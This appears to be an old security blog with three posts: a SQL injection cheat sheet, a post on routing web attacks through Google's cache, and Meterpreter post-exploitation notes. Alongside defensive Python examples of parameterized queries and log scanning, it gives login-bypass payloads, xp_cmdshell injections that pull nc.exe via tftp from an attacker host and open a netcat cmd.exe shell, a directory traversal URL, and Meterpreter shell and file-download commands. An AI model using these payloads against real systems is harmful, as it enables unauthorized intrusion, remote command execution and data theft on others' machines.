A small reference when testing and using SQL Injection.
Note: This is for my reference, so if there is not enough detail I apologize.
Testing For SQL Injection Vulnerabilities:
We want to see whether the input is sanitized or checked; below is something you can insert into the form to find out.
ba' or 1=1--
Example:
User: ba' or 1=1--
Pass: ba' or 1=1--
Query Manipulation:
SELECT * FROM table WHERE user='ba'
-TO-
SELECT * FROM table WHERE user='ba' or 1=1--
Other examples (depending on how the query was written, here are other options to try):
' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
" or "1"="1
') or ('1'='1
Note: the ( -- ) is only needed for MS SQL servers. The ( -- ) tells the server to ignore the rest of the query; sometimes it can be replaced with ( # ). This makes sure your single quotes ( ' ) stay balanced. Also, if the field is hidden you can submit the form from your local box with the injection in it.
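To see concretely why the payloads above work, here is an added example (not from the original post) in Python against an in-memory SQLite database with constructed sample rows: a login check that concatenates user input into the query text, beside the same check written with bound parameters. The table and column names are assumptions. The cheat-sheet payloads bypass the concatenated version and are treated as plain data by the parameterized one.

```python
import sqlite3


def make_db():
    """Constructed sample database with a single user row (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_concat(conn, user, password):
    """Vulnerable: input is pasted into the SQL text, so a quote plus an
    OR tautology or a comment marker rewrites the WHERE clause."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_param(conn, user, password):
    """Hardened: the driver binds the values, so they can never become SQL."""
    sql = "SELECT user FROM users WHERE user=? AND pass=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def compare(user, password):
    """Run one credential pair through both versions and report the outcome."""
    conn = make_db()
    try:
        return {
            "concat": login_concat(conn, user, password),
            "param": login_param(conn, user, password),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for u, p in [("alice", "s3cret"),
                 ("ba' or 1=1--", "ba' or 1=1--"),
                 ("' or '1'='1", "' or '1'='1")]:
        print(repr(u), compare(u, p))
```

With `ba' or 1=1--` the concatenated query becomes `... WHERE user='ba' or 1=1--' AND pass='...'`: the tautology matches every row and the comment marker discards the password check, which is exactly the query manipulation shown above. The parameterized query sends the same string as a value, so no row matches.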
Remote Execution on MS SQL:
Now we know the server is vulnerable. While nice, the above does not always let us bypass the login screen, or we may just want to do something different. Here is an option.
Start a sniffer on a box you own:
# tcpdump udp and port 53 and host victimhostname
Now make the victim do a DNS query against your box:
'; EXEC master..xp_cmdshell 'nslookup mybox.com' --
You will see the DNS query in your tcpdump output, which means the EXEC worked! Now you can do whatever you like. For demonstration purposes let's just upload Netcat and execute it.
'; EXEC master..xp_cmdshell 'tftp -i mybox.com GET nc.exe c:\nc.exe' --
Now execute Netcat so it's listening.
'; EXEC master..xp_cmdshell 'c:\nc.exe -l -p 9999 -e cmd.exe' --
Now, if you know what to do, the box is all yours!
Note: the ( ; ) ends the previous query and starts the next. Also, if the ( ' ) is not working, try a ( " ).
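From the defender's side, the payloads in this post leave recognizable traces in web server logs once the query string is URL-decoded. The following is an added example, not part of the original post, that scans a few constructed Apache-style access log lines for the patterns used above: a quote followed by an OR tautology, a SQL comment marker, a stacked `; EXEC`, and `xp_cmdshell` itself. The log lines, the signature names and the `/login.asp` path are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log lines (not from the original post): one normal login,
# one tautology bypass, one xp_cmdshell attempt, one ordinary page hit.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2005:10:01:02 -0500] "GET /login.asp?user=bob&pass=hunter2 HTTP/1.1" 200 512
10.0.0.9 - - [29/Nov/2005:10:01:09 -0500] "GET /login.asp?user=ba%27+or+1%3D1-- HTTP/1.1" 200 512
10.0.0.9 - - [29/Nov/2005:10:01:30 -0500] "GET /login.asp?user=%27%3B+EXEC+master..xp_cmdshell+%27nslookup+mybox.com%27+-- HTTP/1.1" 500 211
10.0.0.7 - - [29/Nov/2005:10:02:00 -0500] "GET /news.asp?id=42 HTTP/1.1" 200 9812
"""

# Common log format: ip ident user [timestamp] "method path protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures derived from the cheat-sheet payloads (names are assumptions).
SIGNATURES = [
    # a quote or word boundary, then OR, then something = something
    ("tautology", re.compile(r"""(['"]|\b)\s*or\s+['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    # SQL line or block comment markers used to discard the rest of the query
    ("comment", re.compile(r"--|/\*")),
    # statement terminator followed by EXEC (stacked query)
    ("stacked-exec", re.compile(r";\s*exec\b", re.I)),
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
]


def decode_query(path):
    """Return the URL-decoded query string; attackers encode quotes and spaces."""
    _, _, query = path.partition("?")
    return unquote_plus(query)


def scan_log(text):
    """Return one record per log line whose decoded query matches a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        query = decode_query(m.group("path"))
        matched = [name for name, rx in SIGNATURES if rx.search(query)]
        if matched:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "query": query, "signatures": matched})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["signatures"], repr(hit["query"]))
```

Decoding before matching matters: the raw log shows `%27+or+1%3D1--`, which none of the signatures would catch as-is. Signature matching like this produces false positives on legitimate text containing `or` and `=`, so in practice it is a triage aid alongside the parameterized queries that actually remove the vulnerability.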
Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become too long. Later I will cover other topics such as information gathering from ODBC error messages, column gathering, querying specific things, and blind SQL injection.
Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Tuesday, November 29, 2005
Monday, November 7, 2005
Web Attacking Through Google
An attacker may be able to perform web-based attacks through Google. The goal of the attacker would be to have Google process the malicious request against the target.
I first tested it with the ad-content section of the personal Google page, which it seems does at least need some type of RSS content to process.
For example, here is a very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant
At first I was thinking you could add this to "add content" on the personal page. It didn't seem to work. Like I said earlier, it does want some type of RSS content.
So I then tried something like this in "add content":
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant
Still no go.
So then I thought of Google caching.
Basically you set up a static HTML page on some free web hosting company; the page would have all of the attack links (directory traversals, SQL injections, PHP exploits, etc.).
Wait for google to cache it.
Viewing the page through google cache, the attacker could then launch all of the attacks from google.
This would all be done with a point and click.
Not really that dangerous, since if you really wanted to find the attacker, Google could provide you with logs. But it would be from an anonymous web site and would be two more steps (could even proxy the registration of the site).
It would look weird for the person watching the IDS (Google attacking??); some may even not think anything of it, thinking it's just the Googlebot. Also, it would be hard for the target to block you, considering most places do not want to block Google.
This just kind of follows up on Johnny Long's idea of zero-packet attacks.
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf
Thursday, November 3, 2005
Post-Exploitation w/ Meterpreter
Since I seem to forget how to use Meterpreter every time, I figured I would just document some basic functions of it.
More information can be found at http://www.metasploit.org
After the box is exploited and you have Meterpreter as the payload, you can begin to use it.
There are many extensions that can be used. Different extensions provide different uses.
1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.
Here is how you load them.
use -m Process
loadlib: Loading library from 'ext950591.dll' on the remote machine.
There is a lot you can do, but I'm just going to show what I use the most.
Below will get you a cmd prompt on the machine (assuming it's Windows).
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
You now have to interact with the assigned channel. Then you've got cmd!
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y
With the Fs extension you can download and upload files.
meterpreter> use -m Fs
meterpreter> download file location
And that's pretty much what I use the most. Maybe later I will write an advanced section.